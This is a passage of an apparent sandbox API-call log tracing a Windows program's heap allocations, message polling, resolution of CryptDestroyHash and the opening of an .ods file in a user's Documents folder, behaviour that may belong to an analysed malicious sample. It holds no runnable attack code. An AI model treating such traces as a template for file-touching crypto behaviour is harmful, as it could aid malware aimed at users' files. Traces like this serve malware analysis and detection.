hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0265.629] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0265.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d860 | out: hHeap=0x25c0000) returned 1 [0265.629] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0265.629] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0265.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0265.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0265.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0265.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0265.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0265.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0265.630] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0265.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0265.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0265.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa830 [0265.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0265.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0265.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0265.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0265.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0265.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0265.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0265.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0265.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0265.631] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0265.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0265.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0265.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0265.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0265.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0265.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0265.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0265.634] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0265.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0265.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0265.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0265.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0265.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0265.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0265.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x11) returned 0x2466df0 [0265.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466df0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0265.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0265.635] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6440 [0265.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0265.636] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0265.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6440 | out: hHeap=0x25c0000) returned 1 [0265.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0265.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1808 [0265.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0265.636] CryptDestroyHash (hHash=0xaa58a0) returned 1 [0265.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0265.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0265.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0265.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0265.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0265.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0265.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0265.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0265.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0265.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0265.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0265.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0265.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8c0 | out: hHeap=0x25c0000) returned 1 [0265.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0265.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0265.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0265.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0265.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0265.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0265.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0265.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0265.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0265.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0265.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0265.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0265.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0265.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0265.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0265.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0265.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b70 | out: hHeap=0x25c0000) returned 1 [0265.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0265.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0265.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0265.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0265.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.639] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c98 [0265.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0265.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0265.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0265.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0265.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0265.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0265.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0265.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0265.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0265.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0265.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7a0 [0265.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1808 [0265.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0265.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0265.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa128 | out: hHeap=0x25c0000) returned 1 [0265.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c98 | out: hHeap=0x25c0000) returned 1 [0265.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0265.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0265.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bc8 | out: hHeap=0x25c0000) returned 1 [0265.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0265.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0265.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0265.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0265.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2060 | out: hHeap=0x25c0000) returned 1 [0265.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0265.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0265.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0265.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0265.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0265.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0265.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0265.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0265.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0265.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0265.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0265.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2150 | out: hHeap=0x25c0000) returned 1 [0265.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0265.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0265.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0265.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3bf0 | out: hHeap=0x25c0000) returned 1 [0265.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0265.642] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0265.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0265.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b69e0 | out: hHeap=0x25c0000) returned 1 [0265.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0265.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0265.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0265.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0265.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0265.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0265.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0265.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0265.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0265.643] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0265.644] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0265.644] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.644] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.644] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0265.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0265.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0265.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0265.644] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0265.644] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/OQOxXrKa.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\oqoxxrka.ods"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 